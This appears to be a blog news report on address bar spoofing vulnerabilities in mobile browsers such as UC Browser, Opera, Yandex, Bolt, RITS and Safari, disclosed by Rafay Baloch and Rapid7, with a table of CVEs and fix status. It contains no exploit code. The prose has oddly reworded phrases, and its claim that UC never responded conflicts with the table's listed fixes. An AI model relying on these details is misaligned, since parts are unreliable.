Mobile browsers experience vulnerabilities in Address Bar

Mobile browsers experience vulnerabilities in Address Bar

The presence of address bar spoofing vulnerabilities in various smartphone browsers has recently been exposed by cybersecurity company Rapid7. Upon exploitation, these bugs will do significant harm to the multiple users since they won’t even recognize the bogus pages. The seven smartphone browsers, including some common ones, were infected by about 10 different vulnerabilities. Specifically, the UC Browser, Opera Mini, Opera Touch, Yandex Browser, Bolt Browser, RITS Browser, and Apple Safari are insecure browsers.

Regardless of being extraordinary, all the bugs had a similar effect address bar spoofing. It means that an attacker may spoof the URLs of legitimate websites to malicious web pages. The intruder does not need to hijack the legitimate goal website in such attacks. Instead, the attacker tries to manipulate the bugs in each browser to view the URL improperly. Since a client can check the authenticity of a URL by taking a gander at the URL, address bar ridiculing can undoubtedly deceive the users. That is the reason browsers ought to stay careful about such bugs that can lead to spoofing.

According to Rafay Baloch, a security researcher who discovered the bugs, “First and foremost, it is easy to persuade the victim into stealing credentials or distributing malware when the address bar points to a trusted website and giving no indicators forgery, secondly since the vulnerability exploits a specific feature in a browser, it can evade several anti-phishing schemes and solutions.”

The vulnerabilities originally grabbed the eye of Pakistani security researcher Rafay Baloch. In his article, he shared the bugs technical descriptions and the PoC- Proof of Concept. Rapid7 then coordinated with Baloch to report the vulnerabilities to the respective vendors. The vendors had a 60-day timeframe for fixing the bugs. The circumstance is that Apple and Opera clients are sheltered since the two sellers reacted quickly to the bug report.

Opera Mini awaits a patch for which a set release for November 11, 2020, has been committed by the vendors. In the subsequent browser updates, Yandex and RITS both reacted before public disclosure and dedicated fixes. Notwithstanding, the UC Browser users should be cautious since the vendors didn’t react to the bug report. It isn’t certain whether they have fixed or are wanting to fix the bugs at any point soon.

Affected Browsers by Rapid7

CVEVendorBrowserVersionPlatformFixed?
CVE-2020-7363UCWebUC Browser13.0.8AndroidFixed v13.3.2 on Oct 21, 2020
CVE-2020-7364UCWebUC Browser13.0.8AndroidFixed v13.3.2 on Oct 21, 2020
CVE TBD-OperaOperaOpera Mini51.0.2254AndroidFix expected from vendor Nov. 11, 2020
CVE TBD-OperaOperaOpera Touch2.4.4iOSFixed in version 2.4.5 released Sep 15, 2020
CVE TBD-OperaOperaOpera Touch2.4.4iOSFixed in version 2.4.5 released Sep 15, 2020
CVE TBD-OperaOperaOpera Touch2.4.4iOSFixed in version 2.4.5 released Sep 15, 2020
CVE-2020-7369YandexYandex Browser20.8AndroidAutomated reply, followed up Oct. 19, 2020. Fix published Oct 1 in version 20.8.4.
CVE-2020-7370Danyil VasilenkoBolt Browser1.4iOSSupport email bounced, alerted Apple product security
CVE-2020-7371Raise IT SolutionsRITS Browser3.3.9AndroidFix expected Oct. 19, 2020
CVE-2020-9987AppleSafariiOS 13.6iOSFix released Sept. 16, 2020

Leave a Reply

Your email address will not be published. Required fields are marked *